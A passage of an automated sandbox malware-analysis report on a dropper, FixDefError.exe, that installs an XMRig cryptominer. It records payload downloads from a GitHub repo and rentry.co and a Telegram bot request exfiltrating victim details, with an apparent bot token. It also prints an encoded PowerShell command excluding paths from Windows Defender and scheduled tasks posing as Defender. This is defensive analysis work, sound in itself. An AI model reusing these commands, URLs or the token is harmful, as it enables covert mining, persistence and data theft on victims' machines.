      Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys
      Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.comD8
      Source: powershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://render.githubusercontent.com
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlig/raw
      Source: RegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co4
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
      Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
      Source: svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
      Source: svchost.exe, 00000043.00000002.322850699.000001CFFD829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
      Source: svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322908815.000001CFFD83B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
      Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/benchmark/%s
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/docs/algorithms
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/wizard
      Source: svhost.exe.1.drString found in binary or memory: https://xmrig.com/wizard%s
      Source: unknownDNS traffic detected: queries for: www.google.com
      Source: global trafficHTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1User-Agent: Mozilla/5.0Host: api.telegram.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.co
      Source: global trafficHTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49686 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49687 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49688 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49689 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.3:49690 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49692 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 198.251.88.130:443 -> 192.168.2.3:49695 version: TLS 1.2
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeWindow created: window name: CLIPBRDWNDCLASS

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Modifies the hosts file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: sslproxydump.pcap, type: PCAPMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Uses powercfg.exe to modify the power settings
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: sslproxydump.pcap, type: PCAPMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: sslproxydump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
      Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D8989
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1649
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D7918
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1E98
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D052D
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D073A
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D27B2
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D07EB
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D0600
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D06DD
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D094F
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D0818
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D08BC
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D3308
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1250
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1240
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D32F8
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D7534
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D34B8
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D17C8
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1903
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D19B5
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1800
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1B5F
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1BAC
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D7C0E
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1C47
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_011D1CD6
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_084ED008
      Source: C:\Users\user\Desktop\FixDefError.exeCode function: 0_2_084ECFE6
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7C1D8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F70BF0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F76F9C
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F710C0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7BA20
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77D90
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7BD80
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7C5E8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F728D0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F728C2
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F7CA40
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F70B47
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F710B0
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F733C8
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F733B9
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77958
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77D80
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeCode function: 1_2_00F77FAE
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02400B00
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02406CAC
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02407670
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02401EC8
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02402860
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_024033A0
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02407660
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02407669
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02403528
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02403538
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeCode function: 56_2_02401E5E
      Source: FixDefError.exe, 00000000.00000002.302610547.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImpulse.exe> vs FixDefError.exe
      Source: FixDefError.exe, 00000000.00000000.245216110.0000000000562000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
      Source: FixDefError.exe, 00000000.00000002.272580789.0000000000B39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FixDefError.exe
      Source: FixDefError.exeBinary or memory string: OriginalFilenameProgramInstaller.exeB vs FixDefError.exe
      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile created: C:\ProgramData\RuntimeBrokerData\WinRing0x64.sysJump to behavior
      Source: svhost.exe.1.drStatic PE information: Number of sections : 11 > 10
      Source: Joe Sandbox ViewDropped File: C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe A5ABDD354FCF673AD85A3A9D467B6184F46EF50FC300BA78C8ABABBDCABCA96D
      Source: ProgramStarter.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: FixDefError.exeReversingLabs: Detection: 25%
      Source: FixDefError.exeVirustotal: Detection: 39%
      Source: FixDefError.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FixDefError.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\FixDefError.exe C:\Users\user\Desktop\FixDefError.exe
      Source: C:\Users\user\Desktop\FixDefError.exeProcess created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
